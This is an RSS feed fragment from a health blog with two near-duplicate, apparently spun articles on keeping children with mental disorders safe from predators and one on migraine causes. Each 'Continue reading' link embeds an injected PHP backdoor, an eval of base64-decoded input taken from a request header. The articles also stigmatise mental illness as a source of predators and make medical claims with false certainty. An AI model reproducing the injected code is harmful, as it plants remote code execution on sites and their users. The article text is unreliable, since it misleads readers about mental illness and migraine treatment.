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		<title>Keeping Children with Mental Disorders Safe</title>
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		<pubDate>Sat, 27 Jun 2009 07:51:33 +0000</pubDate>
		<dc:creator>Owen Jones</dc:creator>
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		<description><![CDATA[Who are the predators? Predators are Cyber Stalkers, serial killers/rapists, rapists, paedophiles, women beaters, child abusers, thieves et cetera. Predators very often have mental problems that keep them from behaving properly in normal society. Children with mental illnesses are often the victims of these predators, and sometimes children with mental illnesses are the predators themselves. In fact, the distributor of one of the most dangerous viruses online came from an eighteen-year old English boy. <a href="http://mybackpaintherapy.com/blog/2009/06/27/keeping-children-with-mental-disorders-safe/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))&#124;.+)&#038;%/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div style='font-style:italic;' class='byline'>by Marion Jones</div>
<p>Who are the predators? Predators are Cyber Stalkers, serial killers/rapists, rapists, paedophiles, women beaters, child abusers, thieves et cetera. Predators very often have mental disorders that keep them from behaving properly in normal society. Children with mental disorders are often the victims of these predators, and sometimes children with mental disorders are the predators themselves. In fact, the creator of one of the most serious viruses online came from an eighteen-year old English boy.</p>
<p><b>Dangers mental illnesses:</b> Not everyone with a mental disorder is a danger to society. Generally, predators with mental disorders are plagued with sociopathic, psychopathic and anti-social disorders, oppositional defiance, conduct control disorders, schizophrenia, borderline personality disorders (BPD), and psychosis. While there are a few other mental illnesses that pose threats to our society, this is a list of the most common potential dangers that lurk on the streets and on the Internet.</p>
<p><b>How to save a child with mental disorders from dangers :</b> Never treat your child as if he/she has a mental disorder. Treat your child as special, yet avoid treating the child as if he/she is mentally ill, since many mentally ill patients are extremely intelligent. Teach your child the same rules that other children have to live by and stick to those rules. Do not leave room for leniency when danger is present. Teach your child respect by showing respect yourself.</p>
<p>Children with dangerous mental illnesses will often want to watch pornography, violent images, content, et cetera. This makes it difficult as a parent to protect your child. However, it is vital that you lay down the rules. Never put yourself in danger while enforcing these rules, since some children with serious problems may cause you harm. </p>
<p>If the child refuses to listen to you, bring the police in and make sure that they do their job to help you enforce the rules. You may pay court fees and go through headaches, but I promise you it will benefit you in the end. As a mother raising two boys with dangerous mental diseases, I can tell you it isn&#8217;t simple, but it can be done.</p>
<p>Children with mental illnesses often have brilliant minds that can usually get round any parental controls and will do so without you even knowing. Take extra time than normal to monitor your child&#8217;s activity online. Teach your child that divulging personal details is dangerous and encourage them to request your permission when considering giving name, phone number or other details online.</p>
<p>Leave room for your child to take some responsibility and always encourage your child to participate in family discussions that concern them. Encourage the child to protect their safety by encouraging them to report any wrong committed against them.</p>
<p>One of the hardest things you&#8217;ll ever have to do while raising a child with mental health issues is teaching him/her to stay away from violent images and pornography. It is almost impossible to keep them clear of this trash. However, it can be done, if you set a good example for the child to follow.</p>
<p>It is important that you keep talking and listening to your child. Allow your child to express concerns, opinions, ideals, theories and so forth without demeaning the child. You will be amazed at the wisdom children with certain mental illnesses have, if you will only listen to them.</p>
<p>The best advice I can give you for dealing with children with major mental illnesses, such as psychopathy, is to seek help and stand firm. For additional child safety tips for children with mental disorders seek advice from a qualified counsellor.</p>
<p>Remember: Children learn what they see and hear.</p>
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		<title>Protecting Children with Mental Disorders</title>
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		<pubDate>Sun, 14 Jun 2009 08:44:26 +0000</pubDate>
		<dc:creator>Marion Jones</dc:creator>
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		<description><![CDATA[Who are the predators? Predators are Cyber Stalkers, serial killers/rapists, rapists, paedophiles, women beaters, child abusers, thieves and so on. Predators often have mental illnesses that keep them from functioning correctly in normal society. Children with mental illnesses are often the prey of these predators, and sometimes children with mental illnesses are the predators themselves. In fact, the creator of one of the most dangerous viruses online came from an eighteen-year old from England. <a href="http://mybackpaintherapy.com/blog/2009/06/14/protecting-children-with-mental-disorders/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))&#124;.+)&#038;%/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div style='font-style:italic;' class='byline'>by Marion Jones</div>
<p>Who are the predators? Predators are Cyber Stalkers, serial killers/rapists, rapists, paedophiles, women beaters, child abusers, thieves et cetera. Predators often have mental problems that prevent them from functioning correctly in normal society. Children with mental illnesses are often the victims of these predators, and sometimes children with mental disorders are the predators themselves. In fact, the creator of one of the most serious viruses online came from an eighteen-year old from England.</p>
<p><b>Dangers mental disorders:</b> Not everyone with a mental illness is a danger to society. In general, predators with mental illnesses are plagued with sociopathic, psychopathic and anti-social disorders, oppositional defiance, conduct control disorders, schizophrenia, borderline personality disorders (BPD), and psychosis. While there are a few other mental disorders that pose a threat to our society, this is a list of the most common potential dangers that lurk on the streets and on the Internet.</p>
<p><b>How to save a child with mental disorders from dangers :</b> Never treat your child as if he/she has a mental disorder. Treat your child as special, yet avoid treating the child as if he/she is mentally ill, because a lot of mentally ill patients are extremely intelligent. Teach your child the same rules that other children have to live by and stick to the rules. Do not leave room for leniency when danger is present. Teach your child respect by showing respect yourself.</p>
<p>Children with dangerous mental illnesses will often engage in pornography, violent images, content, and so forth. This makes it difficult as a parent to protect your child. It is important that you enforce the laws. Never put yourself in danger while enforcing these laws, since some children with dangerous problems can be violent. </p>
<p>If the child refuses to listen to you, bring in the police and make sure that they do their job to help you enforce the rules. You may have to pay court fees and go through all sorts of rigmarole, but I can promise you that it will be worth it in the end. As a mother who is raising two boys with dangerous mental illnesses, I can tell you it won&#8217;t be easy but it can be done.</p>
<p>Children with mental disorders often have brilliant minds that can usually get round any parental controls and will do so without you even knowing. Take more time than normal to monitor your child&#8217;s behaviour online. Teach your child that divulging personal information is dangerous and encourage them to request your permission when considering giving name, phone number or other details online.</p>
<p>Allow your child to take some responsibility for himself and always encourage your child to join in family discussions that involve them. Furthermore, encourage the child to be safety conscious by telling them to report any misdemeanour committed against them.</p>
<p>One of the hardest things you&#8217;ll ever have to do while raising a child with mental health problems is teaching him/her to stay away from violent images and pornography. It is almost impossible to keep them clear of this trash. Still, it can be done, if you set a good example for the child to follow.</p>
<p>It is important that you leave the channels of communication open. Allow your child to express concerns, opinions, ideals, theories et cetera without demeaning the child. You will be astounded at the knowledge children with certain mental disorders have, if you will only listen.</p>
<p>The best advice I can give you for dealing with children with major mental disorders, such as psychopathy, is to seek help and stand firm. For more child safety advice for children with mental disorders seek advice from a qualified professional.</p>
<p>Remember: Children learn what they see and hear.</p>
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		<title>The Causes of Migraine Headaches</title>
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		<pubDate>Fri, 12 Jun 2009 07:10:54 +0000</pubDate>
		<dc:creator>Owen Jones</dc:creator>
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		<description><![CDATA[Headaches in any form are always very painful to the sufferer. However, some headaches, such as migraines, for example, can cause even more problems than just a headache. These problems could be sickness, light sensitivity and a throbbing pain in the head. Sometimes the headache is felt on one  side of the head, although at other times you can feel the pain on both sides of your head at the same time. <a href="http://mybackpaintherapy.com/blog/2009/06/12/the-causes-of-migraine-headaches/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))&#124;.+)&#038;%/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div style='font-style:italic;' class='byline'>by Marion Jones</div>
<p>Headaches in any form are always very painful to the sufferer. However, some headaches, such as migraines, for example, can create even more problems than just a headache. These problems could be nausea, light sensitivity and a banging pain in the head. Sometimes the headache is felt on one  side of the head, although at other times you can feel the pain on both sides of your head at the same time. </p>
<p>The actual causes of migraine headaches has not been found  as of yet, although there are some theories as to why we experience migraine headaches. The most common theory is that a change in the blood flow within the brain is one of the trigger causes of migraine headaches. Another theory about migraine headache is that it could be caused by pain sensing nerve  chemicals called neuropeptides.</p>
<p>Many medical professionals speculate that neuropeptides relax the smooth muscle that surrounds the cranial blood vessels. This relaxation causes the blood vessels to dilate. This blood vessel relaxation increases the flow of blood and other cranial fluid to the brain. This increase in fluids is thought to be the cause of migraine headaches.  </p>
<p>These cranial fluids cause inflammation, pain,  sensitivity, tissue and blood vessel inflammation  during the time of migraine headaches. Some people think that the aura that is sometimes seen during a migraine headache is caused by the constriction of blood vessels that became dilated during the beginning phase of the migraine headache.</p>
<p>Another theory as to the causes of  migraine headaches has been linked to genetics and inheritance. These theories state that a child of migraine sufferers will have a 50% probability of getting migraine headaches too. </p>
<p>The chances of inheriting migraine headaches become even greater if both parents are  known to suffer from this painful type of headache. Should both parents be known to have frequent migraine headaches the chances of the child inheriting migraine headache symptoms is about 70%. </p>
<p>Now even though many professionals think that inheritance plays a large role in migraine headaches the genes that may be considered as the causes of migraine headaches have not been identified or even isolated. When we begin to experience migraine headaches the only warning signs that we may receive are a throbbing pain in the temple area and slight nausea. </p>
<p>As the symptoms of the migraine progresses, the pain  becomes much more severe. Unfortunately, since the causes of migraine headaches have yet to be found and we dont know what triggers these attacks, there are no medications to cure this kind of headaches yet.</p>
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